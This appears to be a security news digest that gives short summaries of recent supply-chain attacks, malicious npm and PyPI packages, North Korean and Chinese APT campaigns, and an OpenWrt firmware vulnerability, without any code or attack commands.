FlagThis

A newly discovered China-aligned APT group called PlushDaemon has been found conducting cyber espionage using a supply chain attack. The group is targeting a South Korean VPN provider and replacing legitimate software installers with malicious ones that deploy the SlowStepper malware. This malware has a large toolkit, programmed in C++, Python and Go, which can conduct espionage. The initial access vector is by hijacking legitimate software updates.

Multiple malicious npm packages have been discovered targeting Solana private keys. These packages, including ‘@async-mutex/mutex’, ‘dexscreener’, ‘solana-transaction-toolkit’, and ‘solana-stable-web-huks’, use typosquatting to appear legitimate while secretly stealing and exfiltrating private keys via Gmail SMTP. This poses a substantial risk to users of Solana wallets.

The Lazarus Group, a North Korean cyber threat actor, is using LinkedIn to target organizations across various sectors. The group uses social engineering to establish contact, then moves communications to other platforms, and tricks victims into downloading malware. This includes posing as recruiters with fake job offers, which ultimately lead to malware infection. This activity highlights the risk of using LinkedIn for business purposes without proper security protocols and employee training and also indicates how social media can be used to target unsuspecting users and bypass common network security measures.

Malicious npm packages are targeting Ethereum developers, impersonating Hardhat plugins to steal private keys and other sensitive data. These packages, with names similar to legitimate Hardhat plugins, are downloaded over 1,000 times, potentially backdooring production systems and causing financial losses. The attackers use Ethereum smart contracts to store and distribute Command & Control (C2) server addresses to compromised systems. The attack uses a supply chain vulnerability.

A zero-day exploit was discovered in the OAuth implementation for Google Chrome extensions. This vulnerability allowed malicious actors to insert malicious code into Chrome extensions via a phishing campaign. The security flaw was identified by SquareX researchers just days before a widespread attack, highlighting the critical need for improved browser security and proactive detection methods for zero day vulnerabilities. This incident led to the hijacking of multiple Chrome extensions, compromising user security.

A supply chain attack has compromised open-source packages associated with rspack and vant, injecting cryptomining malware. The compromised packages had hundreds of thousands of weekly downloads, posing a significant threat to users of these projects. The affected version is 1.1.7. This event underscores the growing threat of supply chain attacks targeting open-source software projects. The vulnerability emphasizes the need for stronger security protocols in open-source ecosystems and for better vetting of dependencies.

A critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server allowed attackers to inject malicious firmware images during updates. The vulnerability exploited a truncated SHA-256 hash collision and a command injection flaw, putting many routers at risk. OpenWrt developers quickly addressed the vulnerability in updated releases. This attack highlights the criticality of securing the firmware update process and the risk of supply chain attacks affecting embedded devices.

A malicious PyPI package, ‘aiocpa’, disguised as a legitimate cryptocurrency client, was used to steal cryptocurrency wallet information. Attackers used a stealthy approach, publishing their own package instead of typosquatting. The malicious code was obfuscated using Base64 encoding and zlib compression; it exfiltrated sensitive data to a Telegram bot. This highlights the risk of malicious packages in software supply chains.

A supply chain attack compromised versions 1.95.6 and 1.95.7 of the @solana/web3.js npm library, a critical JavaScript tool used for Solana blockchain applications. Malicious code inserted into the library could steal private keys, potentially leading to cryptocurrency theft. The compromise affected numerous applications and individual wallets, highlighting the risks of software supply chain attacks in the cryptocurrency space. Developers are urged to upgrade or downgrade the library to avoid compromise.